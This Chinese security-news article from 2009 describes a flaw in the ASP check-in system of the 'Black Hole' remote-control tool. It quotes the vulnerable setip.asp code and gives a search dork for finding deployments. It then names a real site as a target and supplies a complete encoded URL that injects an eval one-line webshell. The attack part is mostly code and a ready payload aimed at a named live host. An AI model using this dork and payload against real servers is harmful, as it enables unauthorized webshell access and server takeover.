黑洞的ASP上线系统的一个漏洞pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报黑洞的ASP上线系统的一个漏洞

黑洞的ASP上线系统的一个漏洞


2009/7/12  编辑:佚名 来源:本站整理

就在默认的情况下, 利用该漏洞可得到上线系统system所在服务器的webshell

ASP上线系统中保存上线IP信息的数据信息库的扩展名默认为asp

写入配置时对参数未作检查, setip.asp相关代码

<%
strIP=Trim(Request.QueryString("Ip"))
strPort=Trim(Request.QueryString("Port"))
strType=Trim(Request.QueryString("Type"))

if strType="0" then
strIP=Request.ServerVariables("REMOTE_HOST")
end if

sql="select * from Info where strMark='Main'"
rs.Open sql,conn,1,3
if not rs.eof or not rs.bof then
rs("strIPAddress")=strIP
rs("strPort")=strPort
rs("strType")=strType
rs.update
'一定不要修改下面的反馈字符.否则程序不知道是否更新成功.
response.write "update success!"
else
response.write "update fail!"
end if
set rs=nothing
conn.close
set conn=nothing

以“inurl:setip.asp”为关键字找了一个测试地址http://zomei.com/blackhole/setip.asp

提交
http://zomei.com/blackhole/setip.asp?Type=%A9%E0%B0Y%CE%DB%A0%84%9F%A8%94%B3%AC%9B%A1%C5%A1%D4%A9%CD%90%F7

这样就插入了EVAL一句话

相关文章
  • 太空中有个可怕的黑色行星(黑洞一样)会吞噬所有的可见光
  • 时间穿梭黑洞是去另一个宇宙的入口
  • 天文学家首次观察到两个超质量黑洞相互环绕!
  • 超质量黑洞可能揭露宇宙暗藏的第五种力
  • 科学家在实验室里造出了分子黑洞,吞食周遭的一切!
  • 天文学家在超质量黑洞附近发现奇怪的神秘物体!
  • 超大质量黑洞如何吞噬恒星?你将看到整个过程
  • 物理学家可能发现侦测裸奇异点的方法,比黑洞还要怪异
  • 天文学家发现有史以来最靠近黑洞环绕的恒星!
  • 星体与黑洞“和平共处”,天文学家难解其因
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图